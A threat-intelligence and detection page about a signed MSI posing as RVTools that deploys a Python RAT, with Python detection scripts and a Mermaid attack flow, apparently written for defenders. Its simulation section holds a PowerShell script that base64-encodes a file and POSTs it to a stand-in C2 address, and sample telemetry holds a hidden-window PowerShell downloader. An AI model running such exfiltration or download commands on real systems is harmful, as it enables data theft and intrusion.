SOC Prime Bias: Medium

29 May 2026 07:20 UTC

RVTools Masquerade: How a Signed Fake Installer Deploys a Modular Python RAT

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

A malicious MSI installer signed with a legitimate certificate masquerades as the RVTools utility used by VMware administrators. Once executed, the installer drops a VBScript that launches PowerShell to download a large ZIP archive from Dropbox. That archive contains a portable Python environment that runs a multi-stage RAT capable of reconnaissance, persistence, and communication with hard-coded command-and-control servers.

Investigation

The analysis traced the MSI to a custom VBScript action, Binary.MyScript.vbs, which decoded an obfuscated PowerShell command. That command downloaded a winp.zip payload into %APPDATA%, extracted Python components and scripts such as collector.py and Pmanager.py, and then established persistence through registry Run keys and a scheduled task after reboot. Researchers also found that the RAT encrypted collected data with RC4 and beaconed to five fixed IP addresses at five-minute intervals.

Mitigation

Organizations should enforce strict code-signing validation with live OCSP or CRL checks, block untrusted MSI execution, and monitor for suspicious VBScript custom actions embedded in installer packages. Defenders should also prevent automatic execution of downloaded scripts, watch for new Run key entries and scheduled task creation, and alert on outbound traffic to unfamiliar hard-coded IP addresses.
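As an added example (not SOC Prime's detection content or the page's own code), the Python script below correlates constructed Sysmon-style events to flag the three host-side signals the analysis describes: a PowerShell downloader spawned by a script host running under msiexec.exe, a Run key written from a user's AppData directory, and a scheduled task registered to run as SYSTEM outside the Microsoft task namespace. The event shape, field names, host names, user names and file paths are assumptions made for the example; the Run key name WinPythonMgr and task name WinPythonDaily are the artifacts reported on this page, and the Dropbox URL is a placeholder.

```python
import re

# Constructed sample telemetry in a flattened Sysmon/Security-log shape (assumption):
# id 1 = process create, id 13 = registry value set, id 4698 = scheduled task created.
SAMPLE_EVENTS = [
    {"id": 1, "host": "ws01", "pid": 100, "ppid": 1,
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\Users\alice\Downloads\RVTools.msi"'},
    {"id": 1, "host": "ws01", "pid": 101, "ppid": 100,
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Windows\Installer\MSI7F3A.tmp"},
    {"id": 1, "host": "ws01", "pid": 102, "ppid": 101,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -w hidden -nop -c iwr https://www.dropbox.com/PLACEHOLDER/winp.zip -OutFile $env:APPDATA\winp.zip"},
    {"id": 13, "host": "ws01", "pid": 103,
     "image": r"C:\Users\alice\AppData\Roaming\winp\python.exe",
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WinPythonMgr",
     "details": r"C:\Users\alice\AppData\Roaming\winp\python.exe manager.py"},
    {"id": 4698, "host": "ws01", "task": r"\WinPythonDaily", "user": "SYSTEM"},
    # Benign noise: a normal MSI install and a Microsoft-namespace task on another host.
    {"id": 1, "host": "ws02", "pid": 200, "ppid": 1,
     "image": r"C:\Windows\System32\msiexec.exe", "cmdline": "msiexec.exe /i vendor.msi /qn"},
    {"id": 4698, "host": "ws02", "task": r"\Microsoft\Windows\Defrag\ScheduledDefrag", "user": "SYSTEM"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
DOWNLOAD_MARKERS = ("downloadfile", "downloadstring", "invoke-webrequest", "iwr ",
                    "invoke-restmethod", "irm ", "start-bitstransfer", "curl ", "wget ")
# Matches -w hidden, -win hidden, -windowstyle hidden (PowerShell accepts parameter prefixes).
HIDDEN_RE = re.compile(r"-w(?:in(?:dowstyle)?)?\s+hidden", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, host, detail) tuples for events matching the chain described above."""
    procs = {(e["host"], e["pid"]): e for e in events if e["id"] == 1}
    findings = []
    for e in events:
        if e["id"] == 1 and basename(e["image"]) in SHELLS:
            # Walk two levels of ancestry: shell <- script host <- msiexec.exe
            parent = procs.get((e["host"], e["ppid"]))
            grand = procs.get((e["host"], parent["ppid"])) if parent else None
            cmd = e["cmdline"].lower()
            suspicious = HIDDEN_RE.search(cmd) or any(m in cmd for m in DOWNLOAD_MARKERS)
            if (parent and basename(parent["image"]) in SCRIPT_HOSTS
                    and grand and basename(grand["image"]) == "msiexec.exe" and suspicious):
                findings.append(("msi_vbs_powershell_downloader", e["host"], e["cmdline"]))
        elif e["id"] == 13 and "\\currentversion\\run\\" in e["target"].lower():
            # Run key written by, or pointing at, a binary under a user profile's AppData.
            if "\\appdata\\" in (e["image"] + e["details"]).lower():
                findings.append(("run_key_from_appdata", e["host"], e["target"]))
        elif e["id"] == 4698 and e["user"].upper() == "SYSTEM":
            # SYSTEM tasks are common; scope to names outside the \Microsoft\ namespace.
            if not e["task"].lower().startswith("\\microsoft\\"):
                findings.append(("non_microsoft_task_as_system", e["host"], e["task"]))
    return findings


if __name__ == "__main__":
    for rule, host, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {host}: {detail}")
```

The Active Setup entry from the attack flow would be caught by the same registry-event branch with a second path prefix; the ancestry check is what keeps the PowerShell rule quiet on ordinary interactive downloads, since it only fires when the shell descends from a script host that msiexec.exe itself launched.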

Response

If this activity is detected, isolate the affected endpoint immediately, collect the MSI, VBScript, and extracted payload files for forensic analysis, and remove all persistence artifacts, including the Run key and scheduled task. The identified command-and-control IP addresses should be blocked at the firewall, and a broader review of credentials and Active Directory activity should be performed to determine whether lateral movement occurred.

Attack Flow

graph TB
    %% Class definitions
    classDef phase fill:#99ccff
    classDef technique fill:#ffcc99
    classDef tool fill:#cccccc
    classDef artifact fill:#e0e0e0
    classDef persistence fill:#c2f0c2
    classDef c2 fill:#f9c2c2
    classDef evasion fill:#f0e68c

    %% Phases
    phase_initial_access["<b>Phase</b>: Initial Access<br/><b>Action</b> – Victim executes a signed malicious MSI that masquerades as RVTools."]
    class phase_initial_access phase
    phase_execution["<b>Phase</b>: Execution<br/><b>Action</b> – MSI uses Msiexec to run a VBScript which launches a hidden PowerShell downloader."]
    class phase_execution phase
    phase_payload["<b>Phase</b>: Payload Deployment<br/><b>Action</b> – Archive is unpacked to a portable WinPython environment containing collector.py and manager.py."]
    class phase_payload phase
    phase_persistence["<b>Phase</b>: Persistence<br/><b>Action</b> – Python manager creates Registry Run key, Scheduled Task and Active Setup entry."]
    class phase_persistence phase
    phase_c2["<b>Phase</b>: Command and Control<br/><b>Action</b> – Collected data is archived, encrypted with RC4 and exfiltrated over HTTP POST to hard-coded IPs."]
    class phase_c2 phase
    phase_evasion["<b>Phase</b>: Defense Evasion<br/><b>Action</b> – Use of signed binaries, proxy execution, and character obfuscation to bypass detections."]
    class phase_evasion phase

    %% Techniques for Initial Access
    tech_user_execution["<b>Technique</b> T1204.002 User Execution: Malicious File<br/>Victim runs a malicious file they believe to be legitimate."]
    class tech_user_execution technique
    tech_masquerading["<b>Technique</b> T1036.001 Masquerading<br/>Binary is signed and named like a legitimate utility (RVTools)."]
    class tech_masquerading technique
    tech_trusted_dev_proxy["<b>Technique</b> T1127 Trusted Developer Utilities Proxy Execution<br/>Signed binary is used to bypass reputation checks."]
    class tech_trusted_dev_proxy technique

    %% Techniques for Execution
    tech_msiexec_proxy["<b>Technique</b> T1218.007 System Binary Proxy Execution: Msiexec<br/>Msiexec is invoked to run the malicious MSI."]
    class tech_msiexec_proxy technique
    tech_vbscript["<b>Technique</b> T1059.005 Command and Scripting Interpreter: Visual Basic<br/>Custom action launches a VBScript payload."]
    class tech_vbscript technique
    tech_powershell["<b>Technique</b> T1059.001 Command and Scripting Interpreter: PowerShell<br/>VBScript decodes and executes a hidden PowerShell download command."]
    class tech_powershell technique

    %% Techniques for Payload Deployment
    tech_archive_custom["<b>Technique</b> T1560.003 Archive Collected Data: Archive via Custom Method<br/>33 MB zip (winp.zip) is downloaded and unpacked to create a portable Python environment."]
    class tech_archive_custom technique

    %% Techniques for Persistence
    tech_registry_run["<b>Technique</b> T1037.004 Boot or Logon Initialization Scripts: Registry Run<br/>Registry Run key is created to launch manager.py at startup."]
    class tech_registry_run persistence
    tech_scheduled_task["<b>Technique</b> T1053 Scheduled Task/Job<br/>Daily scheduled task is created to run with SYSTEM privileges."]
    class tech_scheduled_task persistence
    tech_active_setup["<b>Technique</b> T1547.014 Boot or Logon Autostart Execution: Active Setup<br/>Active Setup entry is added to ensure execution for each user."]
    class tech_active_setup persistence
    tech_hijack_execution["<b>Technique</b> T1574 Hijack Execution Flow<br/>Scheduled task is used to hijack normal execution paths."]
    class tech_hijack_execution evasion

    %% Techniques for Command and Control
    tech_exfil_unencrypted["<b>Technique</b> T1048.003 Exfiltration Over Unencrypted Non-C2 Protocol<br/>Data is sent via HTTP POST to hard-coded IP addresses."]
    class tech_exfil_unencrypted c2
    tech_exfil_asymmetric["<b>Technique</b> T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol<br/>Data is encrypted with RC4 before transmission."]
    class tech_exfil_asymmetric c2

    %% Techniques for Defense Evasion
    tech_system_script_proxy["<b>Technique</b> T1216.002 System Script Proxy Execution: SyncAppvPublishingServer<br/>Trusted scripts act as proxies to hide malicious activity."]
    class tech_system_script_proxy evasion
    tech_system_binary_proxy["<b>Technique</b> T1218 System Binary Proxy Execution<br/>Signed utilities (Msiexec) are abused to bypass application control."]
    class tech_system_binary_proxy evasion

    %% Artifacts
    artifact_msi["<b>Artifact</b>: malicious_RVTools.msi<br/>Signed MSI used for initial access."]
    class artifact_msi artifact
    artifact_zip["<b>Artifact</b>: winp.zip<br/>Dropbox hosted archive containing portable WinPython."]
    class artifact_zip artifact
    artifact_python_env["<b>Artifact</b>: WinPython environment<br/>Contains collector.py and manager.py for reconnaissance."]
    class artifact_python_env artifact
    artifact_registry_key["<b>Artifact</b>: Registry Run Key<br/>HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WinPythonMgr"]
    class artifact_registry_key artifact
    artifact_scheduled_task["<b>Artifact</b>: Scheduled Task<br/>Name: WinPythonDaily, runs with SYSTEM."]
    class artifact_scheduled_task artifact
    artifact_active_setup["<b>Artifact</b>: Active Setup Entry<br/>HKLM\Software\Microsoft\Active Setup\Installed Components\WinPython"]
    class artifact_active_setup artifact
    artifact_c2_ip["<b>Artifact</b>: C2 IP addresses<br/>Hard-coded IPv4 addresses contacted over HTTP."]
    class artifact_c2_ip artifact

    %% Connections
    phase_initial_access -->|uses| tech_user_execution
    phase_initial_access -->|uses| tech_masquerading
    phase_initial_access -->|uses| tech_trusted_dev_proxy
    phase_initial_access -->|delivers| artifact_msi
    tech_user_execution -->|executes| artifact_msi
    tech_masquerading -->|enables| artifact_msi
    tech_trusted_dev_proxy -->|bypasses| artifact_msi
    phase_execution -->|leverages| tech_msiexec_proxy
    tech_msiexec_proxy -->|runs| tech_vbscript
    tech_vbscript -->|launches| tech_powershell
    tech_powershell -->|downloads| artifact_zip
    artifact_zip -->|unpacked to create| artifact_python_env
    phase_payload -->|contains| artifact_python_env
    phase_persistence -->|creates| tech_registry_run
    phase_persistence -->|creates| tech_scheduled_task
    phase_persistence -->|creates| tech_active_setup
    phase_persistence -->|uses| tech_hijack_execution
    tech_registry_run -->|writes| artifact_registry_key
    tech_scheduled_task -->|creates| artifact_scheduled_task
    tech_active_setup -->|writes| artifact_active_setup
    phase_c2 -->|archives and encrypts data| tech_archive_custom
    tech_archive_custom -->|sends via| tech_exfil_unencrypted
    tech_exfil_unencrypted -->|uses| artifact_c2_ip
    tech_exfil_unencrypted -->|also uses| tech_exfil_asymmetric
    phase_evasion -->|applies| tech_system_script_proxy
    phase_evasion -->|applies| tech_system_binary_proxy
    tech_system_binary_proxy -->|facilitates| tech_msiexec_proxy
    tech_system_script_proxy -->|facilitates| tech_vbscript

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    An adversary who has already established a foothold on the victim machine decides to exfiltrate a small data set (e.g., C:\Temp\secret.txt). To avoid triggering generic outbound‑traffic alerts, the actor uses a PowerShell one‑liner that performs an HTTP POST directly to one of the hard‑coded C2 IPs (192.0.2.10). The command is scheduled via a Windows Scheduled Task to ensure persistence (T1546.013). No additional binaries are dropped, keeping the activity “living‑off‑the‑land”.

  • Regression Test Script:

    # -------------------------------------------------
    # PowerShell script – Data exfiltration via hard‑coded IP
    # -------------------------------------------------
    $c2Ip   = "192.0.2.10"
    $c2Port = 80
    # ${var} braces keep the parser from reading "$c2Ip:" as a scope qualifier
    $uri    = "http://${c2Ip}:${c2Port}/exfil"
    $file   = "C:\Temp\secret.txt"
    
    # Ensure the file and its directory exist (create dummy data for the test)
    if (-Not (Test-Path $file)) {
        New-Item -ItemType Directory -Path (Split-Path $file) -Force | Out-Null
        "sensitive data $(Get-Date)" | Out-File -FilePath $file -Encoding ASCII
    }
    
    # Read file content and Base64‑encode it
    $payload = [Convert]::ToBase64String([IO.File]::ReadAllBytes($file))
    
    # Perform the HTTP POST (form-encoded body with a single "data" field)
    $body = @{ data = $payload }
    try {
        Invoke-WebRequest -Uri $uri -Method POST -Body $body -UseBasicParsing -TimeoutSec 10
        Write-Host "Exfiltration attempt sent to $c2Ip"
    } catch {
        Write-Error "Exfiltration failed: $_"
    }
  • Cleanup Commands:

    # Remove the dummy file
    Remove-Item -Path "C:\Temp\secret.txt" -Force -ErrorAction SilentlyContinue
    
    # Delete any scheduled task created for the test (if any)
    $taskName = "DataExfilTask"
    if (Get-ScheduledTask -TaskName $taskName -ErrorAction SilentlyContinue) {
        Unregister-ScheduledTask -TaskName $taskName -Confirm:$false
    }
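Both the real implant (beacons to five fixed IPs at five-minute intervals) and this regression script (an HTTP POST repeated by a scheduled task) leave the same network footprint: a low-jitter, periodic series of connections from one host to an address that no allowlist covers. The Python script below is added here as an example and is not SOC Prime's query or code. It parses constructed proxy-log lines (the line format, internal hosts and timestamps are assumptions; 192.0.2.10 is the test IP from the narrative above, and 198.51.100.7 stands in for a real C2 address) and reports src/dst pairs whose inter-arrival times have a coefficient of variation at or below a threshold.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy-log sample (format is an assumption): an implant-like beacon
# every ~5 minutes with small jitter, the regression test's hourly POST, irregular
# benign update traffic, and a periodic internal health check an allowlist should suppress.
SAMPLE_LOG = """\
2024-05-01T10:00:00Z src=10.0.0.5 dst=198.51.100.7 method=POST uri=/upload bytes=4210
2024-05-01T10:01:00Z src=10.0.0.5 dst=203.0.113.20 method=GET uri=/updates/catalog bytes=812
2024-05-01T10:03:30Z src=10.0.0.5 dst=203.0.113.20 method=GET uri=/updates/pkg1 bytes=91230
2024-05-01T10:05:02Z src=10.0.0.5 dst=198.51.100.7 method=POST uri=/upload bytes=4198
2024-05-01T10:09:58Z src=10.0.0.5 dst=198.51.100.7 method=POST uri=/upload bytes=4220
2024-05-01T10:11:00Z src=10.0.0.5 dst=203.0.113.20 method=GET uri=/updates/pkg2 bytes=77012
2024-05-01T10:12:10Z src=10.0.0.5 dst=203.0.113.20 method=GET uri=/updates/pkg3 bytes=60511
2024-05-01T10:15:01Z src=10.0.0.5 dst=198.51.100.7 method=POST uri=/upload bytes=4205
2024-05-01T10:20:00Z src=10.0.0.5 dst=198.51.100.7 method=POST uri=/upload bytes=4211
2024-05-01T10:24:59Z src=10.0.0.5 dst=198.51.100.7 method=POST uri=/upload bytes=4199
2024-05-01T10:30:00Z src=10.0.0.5 dst=203.0.113.20 method=GET uri=/updates/done bytes=120
2024-05-01T09:00:00Z src=10.0.0.9 dst=192.0.2.10 method=POST uri=/exfil bytes=96
2024-05-01T10:00:00Z src=10.0.0.9 dst=192.0.2.10 method=POST uri=/exfil bytes=96
2024-05-01T11:00:00Z src=10.0.0.9 dst=192.0.2.10 method=POST uri=/exfil bytes=96
2024-05-01T12:00:00Z src=10.0.0.9 dst=192.0.2.10 method=POST uri=/exfil bytes=96
2024-05-01T09:00:00Z src=10.0.0.9 dst=10.0.0.1 method=GET uri=/health bytes=20
2024-05-01T09:05:00Z src=10.0.0.9 dst=10.0.0.1 method=GET uri=/health bytes=20
2024-05-01T09:10:00Z src=10.0.0.9 dst=10.0.0.1 method=GET uri=/health bytes=20
2024-05-01T09:15:00Z src=10.0.0.9 dst=10.0.0.1 method=GET uri=/health bytes=20
"""


def parse_line(line):
    """Split one 'timestamp key=value ...' record into a dict with a datetime 'ts'."""
    ts, *kv = line.split()
    rec = dict(pair.split("=", 1) for pair in kv)
    rec["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return rec


def find_beacons(log_text, min_events=4, max_cv=0.1, allow=frozenset()):
    """Return src/dst pairs with at least min_events connections whose inter-arrival
    times have a coefficient of variation <= max_cv (low jitter means beacon-like)."""
    seen = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec["dst"] in allow:
            continue  # known periodic destinations (monitoring, NTP, ...) are suppressed
        seen[(rec["src"], rec["dst"])].append(rec["ts"])
    hits = []
    for (src, dst), stamps in seen.items():
        if len(stamps) < min_events:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.fmean(gaps)
        if mean <= 0:
            continue  # duplicate timestamps only; nothing periodic to measure
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            hits.append({"src": src, "dst": dst, "count": len(stamps),
                         "period_s": round(mean), "cv": round(cv, 3)})
    return sorted(hits, key=lambda h: (h["src"], h["dst"]))


if __name__ == "__main__":
    for h in find_beacons(SAMPLE_LOG, allow=frozenset({"10.0.0.1"})):
        print(f"{h['src']} -> {h['dst']}: {h['count']} connections, "
              f"~{h['period_s']}s period, cv={h['cv']}")
```

The threshold and minimum count need tuning per network, and the allowlist is what keeps legitimate periodic traffic out of the results; a flagged pair should then be joined back to process telemetry so the alert names the executable responsible, which for the implant described here would be the portable python.exe under %APPDATA%.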